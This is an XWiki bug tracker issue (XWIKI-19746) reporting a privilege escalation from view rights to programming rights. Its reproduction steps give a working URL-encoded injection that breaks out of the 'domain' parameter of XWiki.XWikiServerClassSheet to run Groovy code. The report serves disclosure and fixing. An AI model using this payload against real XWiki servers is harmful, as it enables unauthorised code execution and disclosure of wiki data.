Uploaded image for project: 'XWiki Platform'
  1. XWiki Platform
  2. XWIKI-19746

Privilege escalation (PR) with view rights on XWiki.XWikiServerClassSheet

    XMLWordPrintable

Details

    • High
    • Unknown
    • N/A

    Description

      Steps to reproduce:

      1. Get the form token (attribute data-xwiki-form-token on any page).
      2. Open the URL <server>/xwiki/bin/view/Main/?sheet=XWiki.XWikiServerClassSheet&form_token=<form_token>&action=delete&domain=foo%22%2F%7D%7D%7B%7Basync%20async%3D%22true%22%20cached%3D%22false%22%20context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22hello%20from%20groovy!%22)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D, where <server> is the server of the XWiki installation and <form_token> is the form token you obtained in the first step.

      Expected result:
      The message "Wiki alias "foo"/}}async async="true" cached="false" context="doc.reference"groovy}}println("hello from groovy!"){{/groovy/async" does not exists." is displayed (or any other error message).

      Actual result:
      The message "Wiki alias "foo" does not exists.hello from groovy!"/}}" is displayed, or in other words, the Groovy code has been executed.

      This demonstrates a privilege escalation from just view rights on XWiki.XWikiServerClassSheet and a single other document (in this example, it is the main page, it can be any other page) to programming rights. As the result of the macro execution is displayed, this can not only be used to modify the wiki but also quite easily to disclose all information in the wiki without modifying it.

      The affects version is only the version on which I reproduced the issue, this is very likely much older.

      Attachments

        Issue Links

          Activity

            People

              MichaelHamann Michael Hamann
              MichaelHamann Michael Hamann
              Votes:
              0 Vote for this issue
              Watchers:
              1 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: